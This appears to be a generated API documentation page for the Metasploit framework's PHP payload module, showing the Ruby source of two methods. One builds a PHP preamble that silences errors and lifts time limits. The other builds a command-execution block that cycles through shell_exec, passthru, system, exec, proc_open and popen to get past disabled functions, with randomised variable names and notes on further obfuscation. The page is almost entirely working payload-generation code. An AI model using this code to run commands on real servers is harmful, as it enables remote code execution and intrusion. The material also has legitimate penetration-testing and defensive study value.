Module: Msf::Payload::Php
- Included in:
- Exploit::PhpEXE, BindTcp
- Defined in:
- lib/msf/core/payload/php.rb
Defined Under Namespace
Modules: BindTcp, ReverseTcp, SendUUID
Instance Method Summary collapse
-
#php_preamble(options = {}) ⇒ String
Generate a chunk of PHP code that should be eval'd before #php_system_block.
-
#php_system_block(options = {}) ⇒ String
Generate a chunk of PHP code that tries to run a command.
Instance Method Details
#php_preamble(options = {}) ⇒ String
Generate a chunk of PHP code that should be eval'd before #php_system_block.
The generated code will initialize
19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 |
# File 'lib/msf/core/payload/php.rb', line 19 def php_preamble( = {}) dis = [:disabled_varname] || '$' + Rex::Text.rand_text_alpha(rand(4) + 4) dis = '$' + dis if (dis[0,1] != '$') @dis = dis # Canonicalize the list of disabled functions to facilitate choosing a # system-like function later. preamble = "/*<?php /**/ @error_reporting(0);@set_time_limit(0);@ignore_user_abort(1);@ini_set('max_execution_time',0); #{dis}=@ini_get('disable_functions'); if(!empty(#{dis})){ #{dis}=preg_replace('/[, ]+/',',',#{dis}); #{dis}=explode(',',#{dis}); #{dis}=array_map('trim',#{dis}); }else{ #{dis}=array(); } " return preamble end |
#php_system_block(options = {}) ⇒ String
Generate a chunk of PHP code that tries to run a command.
55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 |
# File 'lib/msf/core/payload/php.rb', line 55 def php_system_block( = {}) cmd = [:cmd_varname] || '$cmd' dis = [:disabled_varname] || @dis || '$' + Rex::Text.rand_text_alpha(rand(4) + 4) output = [:output_varname] || '$' + Rex::Text.rand_text_alpha(rand(4) + 4) if (@dis.nil?) @dis = dis end cmd = '$' + cmd if (cmd[0,1] != '$') dis = '$' + dis if (dis[0,1] != '$') output = '$' + output if (output[0,1] != '$') is_callable = '$' + Rex::Text.rand_text_alpha(rand(4) + 4) in_array = '$' + Rex::Text.rand_text_alpha(rand(4) + 4) setup = " if (FALSE !== stristr(PHP_OS, 'win' )) { #{cmd}=#{cmd}.\" 2>&1\\n\"; } #{is_callable}='is_callable'; #{in_array}='in_array'; " shell_exec = " if(#{is_callable}('shell_exec')&&!#{in_array}('shell_exec',#{dis})){ #{output}=`#{cmd}`; }else" passthru = " if(#{is_callable}('passthru')&&!#{in_array}('passthru',#{dis})){ ob_start(); passthru(#{cmd}); #{output}=ob_get_contents(); ob_end_clean(); }else" system = " if(#{is_callable}('system')&&!#{in_array}('system',#{dis})){ ob_start(); system(#{cmd}); #{output}=ob_get_contents(); ob_end_clean(); }else" exec = " if(#{is_callable}('exec')&&!#{in_array}('exec',#{dis})){ #{output}=array(); exec(#{cmd},#{output}); #{output}=join(chr(10),#{output}).chr(10); }else" proc_open = " if(#{is_callable}('proc_open')&&!#{in_array}('proc_open',#{dis})){ $handle=proc_open(#{cmd},array(array('pipe','r'),array('pipe','w'),array('pipe','w')),$pipes); #{output}=NULL; while(!feof($pipes[1])){ #{output}.=fread($pipes[1],1024); } @proc_close($handle); }else" popen = " if(#{is_callable}('popen')&&!#{in_array}('popen',#{dis})){ $fp=popen(#{cmd},'r'); #{output}=NULL; if(is_resource($fp)){ while(!feof($fp)){ #{output}.=fread($fp,1024); } } @pclose($fp); }else" # Currently unused until we can figure out how to get output with COM # objects (which are not subject to safe mode restrictions) instead of # PHP functions. #win32_com = " # if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) { # $wscript = new COM('Wscript.Shell'); # $wscript->run(#{cmd} . ' > %TEMP%\\out.txt'); # #{output} = file_get_contents('%TEMP%\\out.txt'); # }else" fail_block = " { #{output}=0; } " exec_methods = [passthru, shell_exec, system, exec, proc_open, popen].sort_by { rand } buf = setup + exec_methods.join("") + fail_block #buf = Rex::Text.compress(buf) ### # All of this junk should go in an encoder # # Replace all single-quoted strings with quoteless equivalents, e.g.: # echo('asdf'); # becomes # echo($a.$s.$d.$f); # and add "$a=chr(97);" et al to the top of the block # # Once this is complete, it is guaranteed that there are no spaces # inside strings. This combined with the fact that there are no # function definitions, which require a space between the "function" # keyword and the name, means we can completely remove spaces. # #alpha_used = { 95 } #buf.gsub!(/'(.*?)'/) { # str_array = [] # $1.each_byte { |c| # if (('a'..'z').include?(c.chr)) # alpha_used[c] = 1 # str_array << "$#{c.chr}." # else # str_array << "chr(#{c})." # end # } # str_array.last.chop! # str_array.join("") #} #if (alpha_used.length > 1) # alpha_used.each_key { |k| buf = "$#{k.chr}=chr(#{k});" + buf } #end # #buf.gsub!(/\s*/, '') # ### return buf end |